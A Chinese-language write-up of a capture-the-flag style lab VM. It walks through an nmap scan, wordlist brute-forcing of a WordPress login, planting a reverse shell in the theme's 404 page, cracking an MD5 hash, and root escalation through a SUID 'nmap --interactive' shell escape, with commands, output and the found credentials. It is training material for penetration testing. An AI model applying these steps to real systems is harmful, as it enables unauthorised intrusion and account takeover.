靶场搭建

下载下来是OVA文件，虚拟机打开，开机前将网卡从桥接模式调整至NAT就可以了

IP地址：192.168.74.141

渗透过程

初期信息收集

┌──(root㉿kali)-[~]
└─# nmap -p- -T5 192.168.74.141      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-09 04:28 EDT
Nmap scan report for bogon (192.168.74.141)
Host is up (0.00035s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https
MAC Address: 00:0C:29:EA:7D:06 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 54.25 seconds

80,443端口，又是web层面的攻击，麻木了

打开浏览器看了一眼，woc这个真的牛逼，看上去真的很好玩

dirsearch扫了一下发现有一个robots.txt

进去看了一下有一些提示

User-agent: *
fsocity.dic
key-1-of-3.txt

key-1-of-3：073403c8a58a1f80d943455fb30724b9

fsocity.dic是一个字典

对获取的信息感到困惑，思路卡住了

也许是密码吧，那账号是什么？也包含在里面了？wpscan进行用户名枚举了，没有发现账号啊？

尝试使用wpscan进行列表账号枚举，但是好像没有这个功能==、抓包尝试，发现后台登录的时候如果账号不存在则会提示不存在，那就有枚举的空间了

直接导入这个字典进行爆破，拿到了账号elliot

那接下来就可以用wpscan爆破了，再使用这个字典进行爆破得到密码：ER28-0652。

真是沙比啊，放到最后，跑了85万啊！

文件上传

后台插件文件上传点有问题，不能直接传php了需要传zip。还需要自己做一个包？拉倒吧！直接修改模板，把404.php覆盖成反弹shell。

监听后，随便访问一个页面触发404，直接拿到shell

提权

低权限，需要拿权限

查看一下唯一一个用户robot，里面有一个md5的密码:c3fcd3d76192e4007dfb496cca67e13b

通过somd5.com查询到密码为：abcdefghijklmnopqrstuvwxyz

通过python获取一个交互式shell，然后su到robot账户上

robot没有sudo权限==、

那要么用内核提权漏洞，要么就找Setuid权限的文件尝试利用：find / -perm -4000 2>/dev/null

发现机器上有nmap，低版本的nmap具有交互模式，能够执行shell命令(2.02至5.21)。

那么我们运行这个nmap交互模式：nmap --interactive

拿到root的shell:!sh

nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# whoami
whoami
root

小结

需要了解不同中间件历史版本，wordpress插件上传变成了zip。所以转而修改404页面进行反弹shell。

爆破真是苦力活，靶场带宽足够，要是实战爆破真的是下下策。

nmap低版本的交互功能可以执行shell命令

当用户没有sudo权限时，并且更好方法时，尝试找到suid文件，进行利用。